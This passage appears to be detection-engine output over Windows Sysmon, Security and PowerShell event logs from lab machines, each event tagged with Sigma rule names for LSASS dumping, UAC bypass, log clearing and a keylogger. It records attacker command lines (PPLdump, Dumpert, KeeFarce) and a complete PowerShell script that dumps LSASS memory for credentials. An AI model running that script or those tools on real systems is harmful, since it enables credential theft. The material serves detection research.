(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured 
-Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-1C70-5D69-0000-0010D4551F00","ParentProcessId":1144,"ProcessGuid":"747F3D96-1C70-5D69-0000-0010C9661F00","ProcessId":2888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:08.331"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32154,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.354049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":887106,"Execution_attributes":{"ProcessID":8,"ThreadID":6640},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-07-22T20:29:27.321769Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x3a17a","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"PPLdump.exe -v lsass 
lsass.dmp","Company":"?","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"?","FileVersion":"?","Hashes":"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74","Image":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-EFC5-6081-0000-00203ACE0B00","LogonId":"0xbce3a","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F040-6081-0000-001046AC1B00","ParentProcessId":4864,"ProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ProcessId":6316,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-04-22 22:09:25.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564589,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:25.389633Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Processes Suspicious Parent Directory","LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"Services and Controller app","FileVersion":"10.0.17763.1075 
(WinBuild.160101.0800)","Hashes":"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204","Image":"C:\\Windows\\System32\\services.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E19-6082-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"services.exe","ParentCommandLine":"PPLdump.exe -v lsass lsass.dmp","ParentImage":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","ParentProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ParentProcessId":6316,"ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-22 22:09:26.016"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564593,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.081337Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","CreateMiniDump Hacktool"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-04-22 22:09:26.157","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.dmp","UtcTime":"2021-04-22 
22:09:26.157"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":564596,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.163007Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E1A-6082-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":624,"ProcessGuid":"747F3D96-F41F-6081-0000-001078834A00","ProcessId":6644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-22 
22:09:35.263"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564605,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:35.284225Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-09-28 12:47:36.624","Image":"C:\\WINDOWS\\system32\\rdrleakdiag.exe","ProcessGuid":"BC47D85C-DB68-5F71-0000-0010B237AB01","ProcessId":3352,"RuleName":"","TargetFilename":"C:\\Users\\wanwan\\Desktop\\minidump_668.dmp","UtcTime":"2020-09-28 12:47:36.624"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-PIU87N6","Correlation":null,"EventID":11,"EventRecordID":5229,"Execution_attributes":{"ProcessID":2848,"ThreadID":2328},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-09-28T12:47:36.630448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198238040,"Execution_attributes":{"ProcessID":744,"ThreadID":2028},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T09:09:14.916619Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":769792,"Execution_attributes":{"ProcessID":264,"ThreadID":7672},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-17T10:57:37.013214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"CommandLine":"KeeFarce.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40","Image":"C:\\Users\\Public\\KeeFarce.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A19B-5CC4-0000-0020A8FF0000","LogonId":"0xffa8","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-A22D-5CC4-0000-0010E2830900","ParentProcessId":3680,"ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"technique_id=T1036,technique_name=Masquerading","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-27 18:47:00.046"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7020,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.046849Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747","Image":"C:\\Users\\Public\\KeeFarce.exe","ImageLoaded":"C:\\Users\\Public\\BootstrapDLL.dll","ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"creddump - keefarce HKTL","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-04-27 18:47:00.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7022,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.062474Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Users\\administrator\\Desktop\\x64\\Outflank-Dumpert.exe","ProcessGuid":"ECAD0485-88C9-5D0C-0000-0010348C1D00","ProcessId":3572,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 
07:35:37.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238375,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:37.329185Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.258"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238380,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.259077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 
07:35:50.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238383,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.729226Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 07:36:50.985","Image":"C:\\Users\\administrator\\Desktop\\AndrewSpecial.exe","ProcessGuid":"ECAD0485-8912-5D0C-0000-0010FD2F1F00","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\Desktop\\Andrew.dmp","UtcTime":"2019-06-21 07:36:50.985"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238387,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:36:51.681567Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Version","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5589,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Name","UtcTime":"2019-03-17 
20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5590,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE4755D1CB0002A410","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Id","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5591,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\MostRecentStart","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5592,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Accessing WinAPI in PowerShell","Malicious PowerShell Keywords","PowerShell Get-Process LSASS in ScriptBlock"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"C:\\Users\\Public\\lsass_wer_ps.ps1","ScriptBlockId":"27f08bda-c330-419f-b83b-eb5c0f699930","ScriptBlockText":"function Memory($path)\r\n{\r\n\t\t\t \r\n\t\t\t \r\n\t\t$Process = Get-Process lsass\r\n\t\t$DumpFilePath = $path\r\n\t\t\r\n\t\t$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\r\n\t\t$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\r\n\t\t$Flags = [Reflection.BindingFlags] 'NonPublic, Static'\r\n\t\t$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\r\n\t\t$MiniDumpWithFullMemory = [UInt32] 2\r\n\t\r\n\t\t\t\r\n\t\t\t #\r\n\t\t$ProcessId = $Process.Id\r\n\t\t$ProcessName = $Process.Name\r\n\t\t$ProcessHandle = $Process.Handle\r\n\t\t$ProcessFileName = \"$($ProcessName).dmp\"\r\n\t\t\r\n\t\t$ProcessDumpPath = Join-Path $DumpFilePath 
$ProcessFileName\r\n\t\t\r\n\t\t$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\r\n\t\t\t \r\n\t\t$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$ProcessId,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$FileStream.SafeFileHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$MiniDumpWithFullMemory,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero))\r\n\t\t\t \r\n\t\t$FileStream.Close()\r\n\t\t\r\n\t\tif (-not $Result)\r\n\t\t{\r\n\t\t\t$Exception = New-Object ComponentModel.Win32Exception\r\n\t\t\t$ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\r\n\t\t\t\r\n\t\t\t# Remove any partially written dump files. For example, a partial dump will be written\r\n\t\t\t# in the case when 32-bit PowerShell tries to dump a 64-bit process.\r\n\t\t\tRemove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\r\n\t\t\t\r\n\t\t\tthrow $ExceptionMessage\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\"Memdump complete!\"\r\n\t\t}\r\n\t\r\n}"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"4AA5EAE3-4F33-0001-3A2B-A64A334FD601"},"EventID":4104,"EventRecordID":971,"Execution_attributes":{"ProcessID":7008,"ThreadID":6488},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-06-30T14:24:08.254605Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was 
cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":104,"EventRecordID":63220,"Execution_attributes":{"ProcessID":264,"ThreadID":644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-308926384-506822093-3341789130-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:31.453647Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"3B","SubjectUserName":"a-jbrown"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"ppldump.exe -p lsass.exe -o 